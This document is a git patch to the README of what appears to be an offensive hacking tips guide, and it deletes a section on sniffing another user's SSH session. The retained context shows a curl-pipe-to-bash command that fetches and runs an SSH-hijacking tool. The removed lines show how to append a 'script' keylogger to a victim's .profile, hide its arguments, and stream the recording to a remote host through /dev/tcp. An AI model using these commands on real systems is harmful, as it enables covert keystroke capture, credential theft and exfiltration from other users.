From 41f2e2e2fc1d3d07f8cfcb4684d0bdcf9a941d06 Mon Sep 17 00:00:00 2001 From: SkyperTHC <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 9 Jun 2022 09:20:54 +0100 Subject: [PATCH] Update README.md --- README.md | 10 ---------- 1 file changed, 10 deletions(-) diff --git a/README.md b/README.md index 919ed29..5e38ae8 100644 --- a/README.md +++ b/README.md @@ -771,16 +771,6 @@ The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-i bash -c "$(curl -fsSL ssh-it.thc.org/x)" ``` - -**9.ii Sniff a user's SSH session without strace** - -The tool 'script' has been part of Unix for decades. Add 'script' to the user's .profile. The user's keystrokes and session will be recorded to ~/.ssh-log.txt the next time the user logs in: -```sh -echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile -``` -Consider using [zap-args](#hya-anchor) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host. - - **10.i. How to survive high latency connections**